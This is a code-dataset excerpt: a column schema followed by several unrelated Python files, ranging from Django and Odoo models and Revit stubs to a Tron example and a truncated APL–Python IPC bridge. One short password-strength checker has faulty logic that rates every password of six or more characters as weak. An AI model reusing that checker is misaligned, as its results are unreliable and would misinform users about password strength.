| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 classes |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | length 2–10.3M |
| authors | list | length 1 |
| author_id | string | length 0–212 |
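A minimal sketch of how rows with this schema could be filtered and inspected, assuming the table has been exported locally as Parquet (the file name `code_files.parquet` is an assumption, not something stated above):

```python
import pandas as pd

# Hypothetical local export of the table above (file name is an assumption).
df = pd.read_parquet("code_files.parquet")

# Keep permissively licensed Python files that are neither vendored nor generated.
mask = (df["license_type"] == "permissive") & ~df["is_vendor"] & ~df["is_generated"]

for _, row in df[mask].iterrows():
    # Each row carries repo metadata plus the full file text in `content`.
    print(row["repo_name"], row["path"], row["length_bytes"], "bytes")
```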
75992c9a0e42e4745e9398c401ddc46138b57440
|
00019f515ebf7fad88a95b4c4c31c8674744ae89
|
/menu.py
|
c93efcff1beae555745ba79efc5b82db9bcf6522
|
[] |
no_license
|
realtuna90/python
|
25a10755114373c352e4b45bc946f3e2448dba8b
|
052e2ec03be4d1edc7091b37186491110e10a090
|
refs/heads/master
| 2020-11-26T04:03:33.231759
| 2019-12-19T08:11:45
| 2019-12-19T08:11:45
| 228,960,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 653
|
py
|
# Program that randomly recommends today's lunch menu
import random
menu = ['새마을식당', '초원삼겹살', '멀캠20층', '홍콩반점', '순남시래기']
phone_book = {
    '새마을식당': '010-1234-1123',
    '초원삼겹살': '02-000-0012',
    '멀캠20층': '02-856-4441',
    '홍콩반점': '02-225-3221',
    '순남시래기': '02-111-2222'
}
# print(phone_book['새마을식당'])
# Pick a random element of menu and store it in a variable named lunch
# Exercise: print the randomly chosen restaurant and its phone number
lunch = random.choice(menu)
print(lunch)
print(phone_book[lunch])
|
[
"kms3357@gmail.com"
] |
kms3357@gmail.com
|
fc410463edafcd6936bcce7eaa7410a60db73512
|
0bf283bdae8eb92d6c1dcb321ae7160727ac5e69
|
/src/university_dashboard/models.py
|
d3ed8c1ea928d95fcea3439dc21acba498c5f500
|
[] |
no_license
|
LuisBosquez/student-net-2015
|
5175197daf7f797f812b7212e7818eb742d8d119
|
c4059e06b25bbcb8a0e73dde976b50d1127a11a4
|
refs/heads/master
| 2020-03-30T12:53:34.618913
| 2015-03-27T20:33:50
| 2015-03-27T20:33:50
| 31,245,105
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,772
|
py
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
# Create your models here, yo!
class University(models.Model):
    SUPPORTED_LANGUAGE_CHOICES = (
        ('EN', 'English'),
        ('ES', 'Spanish'),
        ('FR', 'French')
    )
    name = models.CharField(max_length = 200, default = "Some university")
    location = models.CharField(max_length = 200)
    language = models.CharField(max_length = 2, choices = SUPPORTED_LANGUAGE_CHOICES)
    memberSince = models.DateTimeField('Date Joined', default = timezone.now())
    def __str__(self):
        return self.name
class StudentGroup(models.Model):
    STUDENT_GROUP_CATEGORY_CHOICES = (
        ('MJ', 'Major'),
        ('RA', 'Recreational Activty'),
        ('MS', 'Miscellaneous')
    )
    university = models.ForeignKey(University)
    name = models.CharField(max_length = 200, default = "Some student group name")
    description = models.TextField('Description', default = "Some student group")
    category = models.CharField(max_length = 200, default="None specified", choices = STUDENT_GROUP_CATEGORY_CHOICES)
    memberSince = models.DateTimeField('Date Joined', default=timezone.now())
    def __str__(self):
        return self.name
class Student(models.Model):
    STUDENT_MAJOR_CHOICES = (
        ('CS', 'Computer Science'),
        ('EC', 'Economics'),
        ('FI', 'Finance'),
        ('MK', 'Marketing')
    )
    university = models.ForeignKey(University)
    studentGroup = models.ForeignKey(StudentGroup)
    name = models.CharField(max_length = 200, default="Some student")
    email = models.CharField(max_length = 200, default = "email@university.edu")
    major = models.CharField(max_length = 200, choices = STUDENT_MAJOR_CHOICES)
    profile_picture = models.ImageField(upload_to='thumbpath', blank=True)
    def __str__(self):
        return self.name
|
[
"luisdbosquez@gmail.com"
] |
luisdbosquez@gmail.com
|
c86acafbece5cdbeba0a0ae5f5a5532416a95b1e
|
0be246ab3744f6cd6e1858c61850a39fdc03480c
|
/infoSys/migrations/0004_auto_20181202_0037.py
|
cfc1e9d33cc4040f05397ae9c6fba1927b1c41a4
|
[] |
no_license
|
DDDDanny/InfoManSys
|
5225f58f2e53f9b154ba32de515d241336cea6ec
|
dede518fd5f8b5c35019e7ff9cb5ab868365e11f
|
refs/heads/master
| 2020-04-11T12:56:27.851849
| 2019-01-06T07:55:53
| 2019-01-06T07:55:53
| 161,797,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
# Generated by Django 2.0.7 on 2018-12-01 16:37
from django.db import migrations, models
class Migration(migrations.Migration):
    dependencies = [
        ('infoSys', '0003_auto_20181201_1847'),
    ]
    operations = [
        migrations.AlterField(
            model_name='projectinfo',
            name='pro_time',
            field=models.DateTimeField(auto_now_add=True, verbose_name='创建时间'),
        ),
    ]
|
[
"707956456@qq.com"
] |
707956456@qq.com
|
84cac4a3ec870cf2d3aadf5595ef0e5b0c116d8f
|
afbae26b958b5ef20548402a65002dcc8e55b66a
|
/release/stubs.min/Autodesk/Revit/UI/Plumbing.py
|
4d2f1c615c504ceda8bcf1bd0cf231a9e5310a56
|
[
"MIT"
] |
permissive
|
gtalarico/ironpython-stubs
|
d875cb8932c7644f807dc6fde9dd513d159e4f5c
|
c7f6a6cb197e3949e40a4880a0b2a44e72d0a940
|
refs/heads/master
| 2023-07-12T01:43:47.295560
| 2022-05-23T18:12:06
| 2022-05-23T18:12:06
| 95,340,553
| 235
| 88
|
NOASSERTION
| 2023-07-05T06:36:28
| 2017-06-25T05:30:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,914
|
py
|
# encoding: utf-8
# module Autodesk.Revit.UI.Plumbing calls itself Plumbing
# from RevitAPIUI,Version=17.0.0.0,Culture=neutral,PublicKeyToken=null
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class IPipeFittingAndAccessoryPressureDropUIServer(IExternalServer):
    """ Interface for external servers providing optional UI for pipe fitting and pipe accessory coefficient calculation. """
    def GetDBServerId(self):
        """
        GetDBServerId(self: IPipeFittingAndAccessoryPressureDropUIServer) -> Guid
        Returns the Id of the corresponding DB server for which this server provides an
        optional UI.
        Returns: The Id of the DB server.
        """
        pass
    def ShowSettings(self,data):
        """
        ShowSettings(self: IPipeFittingAndAccessoryPressureDropUIServer,data: PipeFittingAndAccessoryPressureDropUIData) -> bool
        Shows the settings UI.
        data: The input data of the calculation.
        Returns: True if the user makes any changes in the UI,false otherwise.
        """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
class PipeFittingAndAccessoryPressureDropUIData(object,IDisposable):
    """ The input and output data used by external UI servers for storing UI settings. """
    def Dispose(self):
        """ Dispose(self: PipeFittingAndAccessoryPressureDropUIData) """
        pass
    def GetUIDataItems(self):
        """
        GetUIDataItems(self: PipeFittingAndAccessoryPressureDropUIData) -> IList[PipeFittingAndAccessoryPressureDropUIDataItem]
        Gets all UI data items stored in the UI data.
        Returns: An array of UI data items.
        """
        pass
    def GetUnits(self):
        """
        GetUnits(self: PipeFittingAndAccessoryPressureDropUIData) -> Units
        Gets units.
        Returns: The Units object.
        """
        pass
    def ReleaseUnmanagedResources(self,*args):
        """ ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIData,disposing: bool) """
        pass
    def __enter__(self,*args):
        """ __enter__(self: IDisposable) -> object """
        pass
    def __exit__(self,*args):
        """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __repr__(self,*args):
        """ __repr__(self: object) -> str """
        pass
    IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Specifies whether the .NET object represents a valid Revit entity.
    Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIData) -> bool
    """
class PipeFittingAndAccessoryPressureDropUIDataItem(object,IDisposable):
    """ The input and output data used by external UI servers for initializing and storing the UI settings. """
    def Dispose(self):
        """ Dispose(self: PipeFittingAndAccessoryPressureDropUIDataItem) """
        pass
    def GetEntity(self):
        """
        GetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> Entity
        Returns the entity set by UI server.
        or an invalid entity otherwise.
        Returns: The returned Entity.
        """
        pass
    def GetPipeFittingAndAccessoryData(self):
        """
        GetPipeFittingAndAccessoryData(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> PipeFittingAndAccessoryData
        Gets the fitting data stored in the UI data item.
        Returns: The fitting data stored in the UI data item.
        """
        pass
    def ReleaseUnmanagedResources(self,*args):
        """ ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIDataItem,disposing: bool) """
        pass
    def SetEntity(self,entity):
        """
        SetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem,entity: Entity)
        Stores the entity in the UI data item.
        entity: The Entity to be stored.
        """
        pass
    def __enter__(self,*args):
        """ __enter__(self: IDisposable) -> object """
        pass
    def __exit__(self,*args):
        """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __repr__(self,*args):
        """ __repr__(self: object) -> str """
        pass
    IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Specifies whether the .NET object represents a valid Revit entity.
    Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> bool
    """
|
[
"gtalarico@gmail.com"
] |
gtalarico@gmail.com
|
d131a9517e2be365b1cd02a2b1ab8f0ab48be333
|
7cdd89eb118e2206e84ef7940d76e603ae8c8235
|
/checker/proverka.py
|
6bb170d41acae877ebee66cdb2f90e94630e66e6
|
[] |
no_license
|
ppofigist/juniors
|
ac5ba3cd780004cd18de5daa433a2bbc5abbe94a
|
873511fc163115113e8b87246fd6c0dbea49dd58
|
refs/heads/master
| 2022-05-27T02:52:52.224501
| 2020-04-28T06:33:05
| 2020-04-28T06:33:05
| 259,547,645
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
def proverka(password):
    if len(password) < 6:
        return 'Недопустимый пароль'
    elif password.isdigit() or password.lower() or password.upper():
        return 'Ненадежный пароль'
    elif password.islower() or password.isupper():
        return 'Слабый пароль'
    return 'Надёжный пароль'
print(proverka('ABCDEgggghh228'))
|
[
"59957987+ppofigist@users.noreply.github.com"
] |
59957987+ppofigist@users.noreply.github.com
|
6c64f27a25fd5960f47fd053e2c459ca3460867a
|
fc7e54796bf63283c2edcba6796036a28c72fe73
|
/examples/amount.py
|
36cbc72a3ebaa974c3cad1fdea0e801a7c96f232
|
[
"MIT"
] |
permissive
|
Oukanina/tron-api-python
|
ef05c635e3b19cbef93edd5b5b9018615fdb3c43
|
8d6f8cf31bad328568c716a9d4cd8a09a6dd9257
|
refs/heads/master
| 2020-04-05T20:06:17.361215
| 2018-11-11T07:34:36
| 2018-11-11T07:34:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 369
|
py
|
from tronapi import Tron
from tronapi import HttpProvider
full_node = HttpProvider('https://api.trongrid.io')
solidity_node = HttpProvider('https://api.trongrid.io')
event_server = HttpProvider('https://api.trongrid.io')
tron = Tron(full_node,
solidity_node,
event_server)
tron.toSun(1)
# result: 1000000
tron.fromSun(1000000)
# result: 1
|
[
"steein.shamsudin@gmail.com"
] |
steein.shamsudin@gmail.com
|
839b94d4d8f8243f8a806580eb30dd9bd25e5f1e
|
3093520d03fb2701e97b60755dd55534efa8d6c6
|
/yoursite/manage.py
|
612e0a62379788b44b248284980f479cd8f7583f
|
[] |
no_license
|
bradwright/django-layout
|
6da01d613135ffa37a1b335f961a0e7e0d2c8baf
|
9b2fe6b862237217e56d00b1f634e15791a96b26
|
refs/heads/master
| 2020-04-10T16:54:26.939487
| 2009-08-29T08:41:14
| 2009-08-29T08:41:14
| 76,139
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
#!/usr/bin/env python
# Hack the Python path to add our `lib` as first in the search path
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../lib'))
# regular stuff carry on
from django.core.management import execute_manager
try:
    import settings  # Assumed to be in the same directory.
except ImportError:
    import sys
    sys.stderr.write("Error: Can't find the file 'settings.py' in the directory containing %r. It appears you've customized things.\nYou'll have to run django-admin.py, passing it your settings module.\n(If the file settings.py does indeed exist, it's causing an ImportError somehow.)\n" % __file__)
    sys.exit(1)
if __name__ == "__main__":
    execute_manager(settings)
|
[
"brad@intranation.com"
] |
brad@intranation.com
|
cf3a580793ca0e8728627bee296bed9d125d4c34
|
195046153bf7c608d7919d0af9005467152ffb74
|
/tests/conftest.py
|
6725c9af6f914c1eda9304d17e74f2e622de7c6e
|
[
"MIT"
] |
permissive
|
adamchainz/time-machine
|
b72d1fb7f60b9f131ace8ea87820b07091fa1568
|
c59e60681b43d504c51b52a6b69ce73dbf9ad998
|
refs/heads/main
| 2023-09-04T06:32:02.228162
| 2023-08-29T16:07:17
| 2023-08-29T16:07:17
| 259,841,110
| 511
| 30
|
MIT
| 2023-09-14T14:22:22
| 2020-04-29T06:16:39
|
Python
|
UTF-8
|
Python
| false
| false
| 148
|
py
|
from __future__ import annotations
import os
import time
# Isolate tests from the host machine’s timezone
os.environ["TZ"] = "UTC"
time.tzset()
|
[
"noreply@github.com"
] |
adamchainz.noreply@github.com
|
a8882dbc39127e18c02e9ea41f7f4c2804e019d4
|
098019f7f1821f01348eaef351ff9770b13adab0
|
/models/product_supply.py
|
c6b642e79ddbcc19a304d96e70fb67972c68f5ca
|
[] |
no_license
|
zyn1030z/stock
|
476b553c444b275543831197b72be75b1683efa9
|
2413bf52fdef6170b10f4e4f1cdade0bb9f75160
|
refs/heads/master
| 2023-05-04T08:21:36.131005
| 2021-05-27T09:59:00
| 2021-05-27T09:59:00
| 371,326,253
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
from odoo import models, fields
class product(models.Model):
    _inherit = 'product.template'
    supply_type = fields.Selection([
        ('warehouse', 'Kho tổng'),
        ('purchase', 'Thu mua')],
        string='Thông tin danh mục hàng hóa', default='warehouse', track_visibility='always', required=True)
|
[
"thaihung412@gmail.com"
] |
thaihung412@gmail.com
|
c49013f41c7b5be215579b86518c5d6fe10595f7
|
166cd1643da77c169eff2cfd6a9b989e1d193417
|
/pynapl/APLPyConnect.py
|
d3a5517c79cea8a6ab56165e7c51ab2f9fc03d81
|
[
"MIT"
] |
permissive
|
Dyalog/pynapl
|
0123bee9036cea04ccfa145cae8287a64b928374
|
7e47c04711a3f4d0c3587fb428f3aefe736006fb
|
refs/heads/master
| 2022-09-22T07:25:44.821175
| 2022-08-31T10:47:23
| 2022-08-31T10:47:23
| 102,481,506
| 70
| 14
|
MIT
| 2022-08-31T10:47:24
| 2017-09-05T12:59:25
|
Python
|
UTF-8
|
Python
| false
| false
| 22,587
|
py
|
# APLPyConnect
# -*- coding: utf-8 -*-
# This module handles the passing of messages between the APL side and the Python side
# The format of a message is:
# 0 1 2 3 4 ......
# TYPE SIZE (big-endian) MESSAGE (`size` bytes, expected to be UTF-8 encoded)
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from __future__ import print_function
import socket, os, time, types, signal, select, sys, json
import tempfile, platform
from . import RunDyalog, Interrupt, WinDyalog, IPC
from .Array import *
from .PyEvaluator import PyEvaluator
from .ObjectWrapper import *
# in Python 2, set string types to be their Python 3 equivalents
if sys.version_info.major == 2:
bytes, str = str, unicode
# in Python 3, allow use of long
if sys.version_info.major >= 3:
long = int
# in Python 2, sockets give bytes as ASCII characters.
# in Python 3, sockets give either Unicode or bytes as ints.
def maybe_ord(item):
if type(item) in (int,long):
return item
else:
return ord(item)
# these fail when threaded, but that's OK
def ignoreInterrupts():
try: return signal.signal(signal.SIGINT, signal.SIG_IGN)
except ValueError: return None # (not on main thread)
def allowInterrupts():
try: return signal.signal(signal.SIGINT, signal.default_int_handler)
except ValueError: return None # pass (not on main thread)
def setInterrupts(x):
if x==None: return None
try: return signal.signal(signal.SIGINT, x)
except ValueError: return None # pass (not on main thread)
class APLError(Exception):
def __init__(self, message="", jsobj=None):
self.dmx = None
# if a JSON object is given, use that
if not jsobj is None:
if type(jsobj) is bytes: jsobj=str(jsobj, 'utf-8')
errobj = json.loads(jsobj)
message = errobj['Message']
if 'DMX' in errobj:
self.dmx = errobj['DMX']
if 'Message' in self.dmx and self.dmx['Message'].strip():
message += ': ' + self.dmx['Message']
# if on Python 3 and these are bytes, convert to unicode
if sys.version_info.major >= 3 and type(message) is bytes:
Exception.__init__(self, str(message, 'utf-8'))
else:
Exception.__init__(self, message)
class MalformedMessage(Exception): pass
class Message(object):
"""A message to be sent to the other side"""
OK=0 # sent as response to message that succeeded but returns nothing
PID=1 # initial message containing PID
STOP=2 # break the connection
REPR=3 # evaluate expr, return repr (for debug)
EXEC=4 # execute statement(s), return OK or ERR
REPRRET=5 # return from "REPR"
EVAL=10 # evaluate a Python expression, including arguments, with APL conversion
EVALRET=11 # message containing the result of an evaluation
DBGSerializationRoundTrip = 253 #
ERR=255 # Python error
MAX_LEN = 2**32-1
def __init__(self, mtype, mdata):
"""Initialize a message"""
self.type = mtype
self.data = mdata
if type(self.data) is str:
self.data = self.data.encode("utf8")
if len(self.data) > Message.MAX_LEN:
raise ValueError("message body exceeds maximum length")
def send(self, writer):
"""Send a message using a writer"""
# turn off interrupt signal handler temporarily
s = None
# this fails under Python 3 if it happens during shutdown
# the workaround is to just ignore it in that case
# the error claims SIG_IGN isn't a valid signal
try:
s = signal.signal(signal.SIGINT, signal.SIG_IGN)
except (TypeError, ValueError):
pass
try:
b4 = (len(self.data) & 0xFF000000) >> 24
b3 = (len(self.data) & 0x00FF0000) >> 16
b2 = (len(self.data) & 0x0000FF00) >> 8
b1 = (len(self.data) & 0x000000FF) >> 0
# Python 2 and 3 handle this differently
# Annoyingly enough, the newest Python 3 (.6) has added support for this back in,
# but we can't expect that version to be present just yet
if sys.version_info.major == 2:
writer.write(b"%c%c%c%c%c%s" % (self.type,b4,b3,b2,b1,self.data))
else:
writer.write(bytes([self.type,b4,b3,b2,b1]))
writer.write(self.data)
writer.flush()
finally:
if s: signal.signal(signal.SIGINT, s)
@staticmethod
def recv(reader,block=True):
"""Read a message from a reader.
If block is set to False, then it will return None if no message is
available, rather than wait until one comes in.
"""
s = None
setsgn = False
try:
if block:
# wait for message available
while True:
if reader.avail(0.1): break
else:
# if no message available, return None
if not reader.avail(0.1): return None
# once we've started reading, finish reading: turn off the interrupt handler
try:
s, setsgn = signal.signal(signal.SIGINT, signal.SIG_IGN), True
except ValueError:
pass # we're not on the main thread, so no signaling at all
# read the header
try:
inp = reader.read(1)
mtype = maybe_ord(inp)
lfield = list(map(maybe_ord, reader.read(4)))
length = (lfield[0]<<24) + (lfield[1]<<16) + (lfield[2]<<8) + lfield[3]
except (TypeError, IndexError, ValueError):
raise MalformedMessage("out of data while reading message header")
# read the data
try:
data = reader.read(length)
except ValueError:
raise MalformedMessage("out of data while reading message body")
if len(data) != length:
raise MalformedMessage("out of data while reading message body")
return Message(mtype, data)
finally:
# turn the interrupt handler back on if we'd turned it off
if setsgn:
signal.signal(signal.SIGINT, s)
class Connection(object):
"""A connection"""
class APL(object):
"""Represents the APL interpreter."""
pid=None
DEBUG=False
store=None
def __init__(self, conn):
self.store = ObjectStore()
self.conn=conn
self.ops=0 # keeps track of how many operators have been defined
def obj(self, obj):
"""Wrap an object so it can be sent to APL."""
return ObjectWrapper(self.store, obj)
def _access(self, ref):
"""Called by the APL side to access a Python object"""
return self.store.retrieve(ref)
def _release(self, ref):
"""Called by the APL side to release an object it has sent."""
self.store.release(ref)
def stop(self):
"""If the connection was initiated from the Python side, this will close it."""
if not self.pid is None:
# already killed it? (destructor might call this function after the user has called it as well)
if not self.pid:
return
try: Message(Message.STOP, "STOP").send(self.conn.outfile)
except (ValueError, AttributeError): pass # if already closed, don't care
# close the pipes
try:
self.conn.infile.close()
self.conn.outfile.close()
except:
pass # we're gone anyway
# give the APL process half a second to exit cleanly
time.sleep(.5)
if not self.DEBUG:
try: os.kill(self.pid, 15) # SIGTERM
except OSError: pass # just leak the instance, it will be cleaned up once Python exits
self.pid=0
else:
raise ValueError("Connection was not started from the Python end.")
def __del__(self):
if self.pid: self.stop()
def fn(self, aplfn, raw=False):
"""Expose an APL function to Python.
The result will be considered niladic if called with no arguments,
monadic if called with one and dyadic if called with two.
If "raw" is set, the return value will be given as an APLArray rather
than be converted to a 'suitable' Python representation.
"""
if not type(aplfn) is str:
aplfn = str(aplfn, "utf-8")
def __fn(*args):
if len(args)==0: return self.eval(aplfn, raw=raw)
if len(args)==1: return self.eval("(%s)⊃∆"%aplfn, args[0], raw=raw)
if len(args)==2: return self.eval("(⊃∆)(%s)2⊃∆"%aplfn, args[0], args[1], raw=raw)
return APLError("Function must be niladic, monadic or dyadic.")
# op can use this for an optimization
__fn.aplfn = aplfn
return __fn
def op(self, aplop):
"""Expose an APL operator.
It can be called with either 1 or 2 arguments, depending on whether the
operator is monadic or dyadic. The arguments may be values or Python
functions.
If the Python function was created using apl.fn, this is recognized
and the function is run in APL directly.
"""
if not type(aplop) is str:
aplop = str(aplop, "utf-8")
def storeArgInWs(arg,nm):
wsname = "___op%d_%s" % (self.ops, nm)
if type(arg) is types.FunctionType \
or type(arg) is types.BuiltinFunctionType:
# it is a function
if hasattr(arg,'__dict__') and 'aplfn' in arg.__dict__:
# it is an APL function
self.eval("%s ← %s⋄⍬" % (wsname, arg.aplfn))
else:
# it is a Python function
# store it under this name
self.__dict__[wsname] = arg
# make it available to APL
self.eval("%s ← (py.PyFn'APL.%s').Call⋄⍬" % (wsname, wsname))
else:
# it is a value
self.eval("%s ← ⊃∆" % wsname, arg)
return wsname
def __op(aa, ww=None, raw=False):
# store the arguments into APL at the time that the operator is defined
wsaa = storeArgInWs(aa, "aa")
aplfn = "((%s)(%s))" % (wsaa, aplop)
# . / ∘. must be special-cased
if aplop in [".","∘."]: aplfn='(∘.(%s))' % wsaa
if not ww is None:
wsww = storeArgInWs(ww, "ww")
aplfn = "((%s)%s(%s))" % (wsaa, aplop, wsww)
# again, . / ∘. must be special-cased
if aplop in [".","∘."]: aplfn='((%s).(%s))' % (wsaa, wsww)
def __fn(*args):
# an APL operator can't return a niladic function
if len(args)==0: raise APLError("A function derived from an APL operator cannot be niladic.")
if len(args)==1: return self.eval("(%s)⊃∆"%aplfn, args[0], raw=raw)
if len(args)==2: return self.eval("(⊃∆)(%s)2⊃∆"%aplfn, args[0], args[1], raw=raw)
raise APLError("Function must be monadic or dyadic.")
__fn.aplfn = aplfn
self.ops+=1
return __fn
return __op
def interrupt(self):
"""Send a strong interrupt to the Dyalog interpreter."""
if self.pid:
Interrupt.interrupt(self.pid)
def tradfn(self, tradfn):
"""Define a tradfn or tradop on the APL side.
Input must be string, the lines of which will be passed to ⎕FX."""
Message(Message.EXEC, tradfn).send(self.conn.outfile)
reply = self.conn.expect(Message.OK)
if reply.type == Message.ERR:
raise APLError(jsobj=str(reply.data,'utf-8'))
else:
return self.fn(str(reply.data,'utf-8'))
def repr(self, aplcode):
"""Run an APL expression, return string representation"""
# send APL message
Message(Message.REPR, aplcode).send(self.conn.outfile)
reply = self.conn.expect(Message.REPRRET)
if reply.type == Message.ERR:
raise APLError(jsobj=str(reply.data,'utf-8'))
else:
return reply.data
def fix(self, code):
"""2⎕FIX an APL script. It will become available in the workspace.
Input may be a string or a list."""
# implemented using eval
if not type(code) is str:
code = str(code, 'utf-8')
if not type(code) is list:
code = code.split("\n") # luckily APL has no multiline strings
return self.eval("2⎕FIX ∆", *code)
def eval(self, aplexpr, *args, **kwargs):
"""Evaluate an APL expression. Any extra arguments will be exposed
as an array ∆. If `raw' is set, the result is not converted to a
Python representation."""
if not type(aplexpr) is str:
# this should be an UTF-8 string
aplexpr=str(aplexpr, "utf8")
# normalize (remove superfluous whitespace and newlines, add in ⋄s where
# necessary)
aplexpr = '⋄'.join(x.strip() for x in aplexpr.split("\n") if x.strip()) \
.replace('{⋄','{').replace('⋄}','}') \
.replace('(⋄','(').replace('⋄)',')')
payload = APLArray.from_python([aplexpr, args], apl=self).toJSONString()
Message(Message.EVAL, payload).send(self.conn.outfile)
reply = self.conn.expect(Message.EVALRET)
if reply.type == Message.ERR:
raise APLError(jsobj=reply.data)
answer = APLArray.fromJSONString(reply.data)
if 'raw' in kwargs and kwargs['raw']:
return answer
else:
return answer.to_python(self)
@staticmethod
def APLClient(DEBUG=False, dyalog=None, forceTCP=False):
"""Start an APL client. This function returns an APL instance."""
# if on Windows, use TCP always
if os.name=='nt' or 'CYGWIN' in platform.system():
forceTCP=True
if forceTCP:
# use TCP
inpipe = outpipe = IPC.TCPIO() # TCP connection is bidirectional
outarg = 'TCP'
inarg = str(inpipe.startServer())
else:
# make two named pipes
inpipe = IPC.FIFO()
outpipe = IPC.FIFO()
inarg = inpipe.name
outarg = outpipe.name
if DEBUG:
print("in: ",inarg)
print("out: ",outarg)
# start up Dyalog
if not DEBUG: RunDyalog.dystart(outarg, inarg, dyalog=dyalog)
if forceTCP:
# wait for Python to make the connection
inpipe.acceptConnection()
else:
# start the writer first
outpipe.openWrite()
inpipe.openRead()
if DEBUG:print("Waiting for PID...")
connobj = Connection(inpipe, outpipe, signon=False)
# ask for the PID
pidmsg = connobj.expect(Message.PID)
if pidmsg.type==Message.ERR:
raise APLError(pidmsg.data)
else:
pid=int(pidmsg.data)
if DEBUG:print("Ok! pid=%d" % pid)
apl = connobj.apl
apl.pid = pid
apl.DEBUG=DEBUG
# if we are on Windows, hide the window
if os.name=='nt': WinDyalog.hide(pid)
return apl
def __init__(self, infile, outfile, signon=True):
self.infile=infile
self.outfile=outfile
self.apl = Connection.APL(self)
self.isSlave = False
if signon:
Message(Message.PID, str(os.getpid())).send(self.outfile)
self.isSlave = True
def runUntilStop(self):
"""Receive messages and respond to them until STOP is received.
"""
self.stop = False
while not self.stop:
sig = ignoreInterrupts()
# is there a message available?
msg = Message.recv(self.infile, block=False)
setInterrupts(sig)
if not msg is None:
# yes, respond to it
self.respond(msg)
def expect(self, msgtype):
"""Expect a certain type of message. If such a message or an error
is received, return it; if a different message is received, then
handle it and go back to waiting for the right type of message."""
while True:
s = None
try:
# only turn off interrupts if the APL side is in control
if self.isSlave: s = ignoreInterrupts()
msg = Message.recv(self.infile)
if msg.type in (msgtype, Message.ERR):
return msg
else:
if self.isSlave: allowInterrupts()
self.respond(msg)
except KeyboardInterrupt:
self.apl.interrupt()
finally:
if self.isSlave: setInterrupts(s)
pass
def respond(self, message):
# Add ctrl+c signal handling
try:
self.respond_inner(message)
except KeyboardInterrupt:
# If there is an interrupt during 'respond', then that means
# the Python side was interrupted, and we need to tell the
# APL this.
Message(Message.ERR, "Interrupt").send(self.outfile)
def respond_inner(self, message):
"""Respond to a message"""
t = message.type
if t==Message.OK:
# return 'OK' to such messages
Message(Message.OK, message.data).send(self.outfile)
elif t==Message.PID:
# this is interpreted as asking for the PID
Message(Message.PID, str(os.getpid())).send(self.outfile)
elif t==Message.STOP:
# send a 'STOP' back in acknowledgement and set the stop flag
self.stop = True
Message(Message.STOP, "STOP").send(self.outfile)
elif t==Message.REPR:
# evaluate the input and send the Python representation back
try:
val = repr(eval(message.data))
Message(Message.REPRRET, val).send(self.outfile)
except Exception as e:
Message(Message.ERR, repr(e)).send(self.outfile)
elif t==Message.EXEC:
# execute some Python code in the global context
sig = None
try:
sig = allowInterrupts()
script = message.data
if type(script) is bytes:
script = str(script, 'utf-8')
PyEvaluator.executeInContext(script, self.apl)
Message(Message.OK, '').send(self.outfile)
except Exception as e:
Message(Message.ERR, repr(e)).send(self.outfile)
finally:
setInterrupts(sig)
elif t==Message.EVAL:
# evaluate a Python expression with optional arguments
# expected input: APLArray, first elem = expr string, 2nd elem = arguments
# output, if not an APLArray already, will be automagically converted
sig = None
try:
sig = allowInterrupts()
val = APLArray.fromJSONString(message.data)
# unpack code
if val.rho != [2]:
raise MalformedMessage("EVAL expects a ⍴=2 array, but got: %s" % repr(val.rho))
if not isinstance(val[[0]], APLArray):
raise MalformedMessage("First argument must contain code string.")
code = val[[0]].to_python(self.apl)
if not type(code) in (str,bytes):
raise MalformedMessage("Code element must be a string, but got: %s" % repr(code))
# unpack arguments
args = val[[1]]
if not isinstance(val[[1]], APLArray) \
or len(val[[1]].rho) != 1:
